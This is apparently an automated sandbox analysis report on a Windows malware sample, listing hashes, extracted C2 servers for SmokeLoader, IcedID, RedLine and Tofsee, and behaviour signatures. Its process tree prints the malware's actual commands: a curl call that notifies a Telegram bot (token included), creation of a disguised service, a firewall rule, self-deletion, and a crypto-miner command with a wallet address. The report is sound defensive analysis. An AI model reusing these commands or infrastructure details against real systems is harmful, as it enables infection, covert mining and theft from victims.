Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    16-12-2021 08:50

General

  • Target

    d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa.exe

  • Size

    335KB

  • MD5

    f7afabac19552c07661e27eca809d08d

  • SHA1

    21a8e0dd005aabd27db4148bad26f6e9c2b24c01

  • SHA256

    d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa

  • SHA512

    532ba1ad9d78ffde5f3b4bc6c2c67a649befada1dad369fd3d3e1e423387dc0c4f6d6f8f1af736b7ea19ebab6052a9c8ff8fe144e35ec01dd3ae6173022e618e

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

3372020928

C2

jeliskvosh.com

Extracted

Family

redline

Botnet

22

C2

195.133.47.114:38127

Extracted

Family

tofsee

C2

mubrikych.top

oxxyfix.xyz

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

  • Arkei Stealer Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 37 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa.exe
    "C:\Users\Admin\AppData\Local\Temp\d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Users\Admin\AppData\Local\Temp\d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa.exe
      "C:\Users\Admin\AppData\Local\Temp\d7acd98bc3c4d569278332dbf9807301c5d93f3a2df7042a4cb45575e610f0fa.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2688
  • C:\Users\Admin\AppData\Local\Temp\CAE.exe
    C:\Users\Admin\AppData\Local\Temp\CAE.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:2836
  • C:\Users\Admin\AppData\Local\Temp\6251.exe
    C:\Users\Admin\AppData\Local\Temp\6251.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Users\Admin\AppData\Local\Temp\6251.exe
      C:\Users\Admin\AppData\Local\Temp\6251.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3632
  • C:\Users\Admin\AppData\Local\Temp\67EF.exe
    C:\Users\Admin\AppData\Local\Temp\67EF.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2644
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\6C26.dll
    1⤵
    • Loads dropped DLL
    PID:748
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 748 -s 504
      2⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:1280
  • C:\Users\Admin\AppData\Local\Temp\77A1.exe
    C:\Users\Admin\AppData\Local\Temp\77A1.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:2960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\77A1.exe" & exit
      2⤵
        PID:3136
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 5
          3⤵
          • Delays execution with timeout.exe
          PID:2156
    • C:\Users\Admin\AppData\Local\Temp\7C26.exe
      C:\Users\Admin\AppData\Local\Temp\7C26.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1196
    • C:\Users\Admin\AppData\Local\Temp\81C5.exe
      C:\Users\Admin\AppData\Local\Temp\81C5.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1560
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\syjdcqdm\
        2⤵
          PID:3740
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gqevylix.exe" C:\Windows\SysWOW64\syjdcqdm\
          2⤵
            PID:1844
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" create syjdcqdm binPath= "C:\Windows\SysWOW64\syjdcqdm\gqevylix.exe /d\"C:\Users\Admin\AppData\Local\Temp\81C5.exe\"" type= own start= auto DisplayName= "wifi support"
            2⤵
              PID:3992
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" description syjdcqdm "wifi internet conection"
              2⤵
                PID:2488
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start syjdcqdm
                2⤵
                  PID:1352
                • C:\Windows\SysWOW64\netsh.exe
                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                  2⤵
                    PID:1480
                • C:\Users\Admin\AppData\Local\Temp\8D10.exe
                  C:\Users\Admin\AppData\Local\Temp\8D10.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3968
                • C:\Users\Admin\AppData\Local\Temp\A685.exe
                  C:\Users\Admin\AppData\Local\Temp\A685.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2844
                • C:\Windows\SysWOW64\syjdcqdm\gqevylix.exe
                  C:\Windows\SysWOW64\syjdcqdm\gqevylix.exe /d"C:\Users\Admin\AppData\Local\Temp\81C5.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3880
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:2544
                • C:\Windows\SysWOW64\explorer.exe
                  C:\Windows\SysWOW64\explorer.exe
                  1⤵
                  • Accesses Microsoft Outlook profiles
                  • outlook_office_path
                  • outlook_win_path
                  PID:2748
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:1376
                  • C:\Users\Admin\AppData\Local\Temp\E7F4.exe
                    C:\Users\Admin\AppData\Local\Temp\E7F4.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:2200
                  • C:\Users\Admin\AppData\Local\Temp\EBCD.exe
                    C:\Users\Admin\AppData\Local\Temp\EBCD.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:2700
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      #cmd
                      2⤵
                      • Checks processor information in registry
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3696
                      • C:\Users\Admin\AppData\Roaming\safas2f.exe
                        "C:\Users\Admin\AppData\Roaming\safas2f.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        PID:2056
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot5083425773:AAHwdCOmptMgnitKuwgje7mHWm43LcalbBY/sendMessage?chat_id=-791710324&text=%F0%9F%99%88 New worker!%0AGPU: Microsoft Basic Display Adapter%0A(Windows Defender has been turned off)"
                          4⤵
                            PID:3740
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                            4⤵
                              PID:3868
                              • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:3500
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                              4⤵
                                PID:1040
                                • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2704
                              • C:\Windows\bfsvc.exe
                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
                                4⤵
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:4056
                              • C:\Windows\explorer.exe
                                "C:\Windows\explorer.exe"
                                4⤵
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:672
                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of SetThreadContext
                                  PID:3612
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                    6⤵
                                      PID:2992
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3968
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                      6⤵
                                        PID:2844
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:2988
                                      • C:\Windows\bfsvc.exe
                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
                                        6⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:352
                                      • C:\Windows\explorer.exe
                                        "C:\Windows\explorer.exe"
                                        6⤵
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:2752
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of SetThreadContext
                                          PID:1552
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                            8⤵
                                              PID:2156
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                9⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:3776
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                              8⤵
                                                PID:1328
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:2484
                                              • C:\Windows\bfsvc.exe
                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
                                                8⤵
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:1376
                                              • C:\Windows\explorer.exe
                                                "C:\Windows\explorer.exe"
                                                8⤵
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:2984
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • Suspicious use of SetThreadContext
                                                  PID:2844
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                    10⤵
                                                      PID:580
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                        11⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:2488
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                      10⤵
                                                        PID:3884
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                          11⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:1136
                                                      • C:\Windows\bfsvc.exe
                                                        C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
                                                        10⤵
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:1548
                                                      • C:\Windows\explorer.exe
                                                        "C:\Windows\explorer.exe"
                                                        10⤵
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:1192
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                                                          11⤵
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious use of SetThreadContext
                                                          PID:2536
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                            12⤵
                                                              PID:392
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                                13⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:3672
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                              12⤵
                                                                PID:3660
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                                                                  13⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:1040
                                                              • C:\Windows\bfsvc.exe
                                                                C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 0x7A73B81c335dc70c3d7DE1e19c776F95cc5DA2c3 -coin etc -worker bobr -clKernel 3
                                                                12⤵
                                                                  PID:3536
                                                                • C:\Windows\explorer.exe
                                                                  "C:\Windows\explorer.exe"
                                                                  12⤵
                                                                    PID:904
                                                • C:\Users\Admin\AppData\Roaming\whw.exe
                                                  "C:\Users\Admin\AppData\Roaming\whw.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:1300
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    #cmd
                                                    4⤵
                                                      PID:1980

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Persistence

                                              New Service

                                              1
                                              T1050

                                              Modify Existing Service

                                              1
                                              T1031

                                              Registry Run Keys / Startup Folder

                                              2
                                              T1060

                                              Privilege Escalation

                                              New Service

                                              1
                                              T1050

                                              Defense Evasion

                                              Disabling Security Tools

                                              1
                                              T1089

                                              Modify Registry

                                              3
                                              T1112

                                              Credential Access

                                              Credentials in Files

                                              2
                                              T1081

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              System Information Discovery

                                              3
                                              T1082

                                              Peripheral Device Discovery

                                              1
                                              T1120

                                              Collection

                                              Data from Local System

                                              2
                                              T1005

                                              Email Collection

                                              1
                                              T1114

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
                                                MD5

                                                eb2d78f0d2e021e170608ba8124f8e57

                                                SHA1

                                                e87ef333807b6d076a2a8f01cac8cb971f3703b3

                                                SHA256

                                                46c5fe006224506450b879ffbfbda262cd88cb7351cc09b5c3a9cb6254b9fc06

                                                SHA512

                                                da30e414683714c86a3c2a72830c26ee8bf65086bffeac947258b1f9038bc5db959e802077e7f1aca0cb683261dcb5d2d4e8f06b3b0002f25f03a5e1f0c76571

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
                                                MD5

                                                2666f06c1a58deef10e67d0b4ba5a448

                                                SHA1

                                                e0fbc2e797dbb0d696f4980a575476a3218e9582

                                                SHA256

                                                c5cf705e4a97a28fab34fdd949b2a94bb8e32105486d25923d7e9f7f55e7c724

                                                SHA512

                                                c9e2e3afbbb4599adfc3eb5c9e158ed43c98fe7c2c522bc093f19a422a70d982baa84abc9250211763a6b4da90ac1c3f5113d0cee81b0ed248b5346309d21ced

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
                                                MD5

                                                1101dd0b6a229c456aab31c15c50b5c7

                                                SHA1

                                                9eb91722a994eb8927aa3ae98279c4ebab9f1fe9

                                                SHA256

                                                ce2a7a3328388dd2bdb99cd87989d56368a2008edc908c504e8b91ee137ffce8

                                                SHA512

                                                bccf1fd5ee10033285f22ae84f646a319fa9984633ad587b4e749e718ef31eef3edc4d7a505fa0cb652fa63e629279dbd648d7c16ca3272245ffbe3ed114795d

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\12B578593FDE07EC53D020B1D5DEBF3B_5D74C2DB556F94499BCD6D74A36958A3
                                                MD5

                                                26d4265b5d4c2aacec142da74ddca8bb

                                                SHA1

                                                489b3c8f8c534cda64c421d471a56271c921fbac

                                                SHA256

                                                39f5c193fd460a3249a62fc79a64b094fad895cd9a82920f91eecbab98b4cc89

                                                SHA512

                                                0302f744f1678bfc19a2e0a947bd5dc52268c0d0b6dababb553bdfd233b908b0fc10051a50563687e403d3798006c2dbf406faac63b2b3fa14bbb1365700bd89

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2A7611428D62805A3E4E5BC4103D82E4_D0FA13DADFB59BDF00C474952E166CC1
                                                MD5

                                                0933f31f23c763d826f3320a976af75d

                                                SHA1

                                                ccf91badeec535ac9babeda000eeae69096be4bd

                                                SHA256

                                                8665732487ce94886e3e63a71ebd24d20674c67b2c2e02f9170c90d181df37d8

                                                SHA512

                                                f34fd054e5d71d5626659d3c2cd04992e251e8f4dcf8c15c700621bb9148b0cbad3f352ead6640fef6dd19a263420b971080bccddc6b01587af0e89b9dbc294f

                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
                                                MD5

                                                aa2d45b54c4690ba5ac516a55e5e5d93

                                                SHA1

                                                38c8ef69510eef4bd8d7ad8d8aeef55a6334c14d

                                                SHA256

                                                9ab3405a3f8ff67cacc1334d6b74dfcc072590a0b9e5b586a667fb4d306889dc

                                                SHA512

                                                58e2245920f6310891b7f05669b6302c14cf71ea604eadc93695c3a6581dae92d28b758d728cd06d3c56fc61b1cc31a6fa6c64bc7939cf52825ed1e45621491a

                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                MD5

                                                37f8586d7be1457df71fa7eb48e734e9

                                                SHA1

                                                cb88daf2e21118e8bebbbea4364961b278ddb480

                                                SHA256

                                                0564925d0c9dfe713227e47742b5c9ab24876abc8b70bffd1beae26034cfaf52

                                                SHA512

                                                c323494885b0298aa6a549cc9138b27c07a8bd8e4247efa297fc31aa6ab5bf7f90b5f528fd14bd6d645ab36ec3063ad36fdd63b9e5d085b86072bc5eeb84990c

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6VZI9KRM\RegData_Temp[1].zip
                                                MD5

                                                574b95f398924bc75a0ac0a06cac44c7

                                                SHA1

                                                e7c3acc030ad152252b1c2119e04e2b21e28c428

                                                SHA256

                                                86fd72d97e721e74520ffa1e5abb10183a7c874ab3e5df72f491572dbbd6586b

                                                SHA512

                                                bd209e1d955cad513890a268e66a03d41dbd487ec03fa7afca06e8e5a6153d3bae913c345b784e82735d934e3c8ae6c4a1914fb0aead91b73adfd18bd35f9261

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KCJJ9ZOX\7z[1].dll
                                                MD5

                                                42336b5fc6be24babfb87699c858fb27

                                                SHA1

                                                38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

                                                SHA256

                                                b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

                                                SHA512

                                                f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UJMJYC0S\7z[1].exe
                                                MD5

                                                86e8388e83be8909d148518cf7b6e083

                                                SHA1

                                                4f7fdcf3abc0169b591e502842be074a5188c2c9

                                                SHA256

                                                4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

                                                SHA512

                                                2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UW5YWWCC\RegHost_Temp[1].zip
                                                MD5

                                                0ce428e006e2bafaab9a97e3fe7465cb

                                                SHA1

                                                23837f3d87a44b323701ba86095e2d0fd7b9c5f3

                                                SHA256

                                                2b30990ae235041f701442c38fe19780f8c24c90ec6750301e11882ae85daeaf

                                                SHA512

                                                d51f24d5b2238caa6363ac746ceb4d702e77ba6ac0b1a93bc2f7870fd2732832d61eb1a7371fce8218bfd692214d4a8a0a12059335e3dd12b6b1b95601214365

                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\4SVHBMU0.cookie
                                                MD5

                                                3904eb5b29b771af7acfd726e3349887

                                                SHA1

                                                8e3620308f8245ac3bfb56be1e6b2c7c96cf04a2

                                                SHA256

                                                17d399ca96e7e14f5aa5c33788a24bd529e799e4278f457a8d88d754abd6aeb0

                                                SHA512

                                                b06b9d786b9280f66c562a70e90dd7aaa9e2a973a96125001dc9a1bc33e35180061856846e2375fdfbee9e475fdc37690cf100213e0eba5072f76d9382022279

                                              • C:\Users\Admin\AppData\Local\Temp\6251.exe
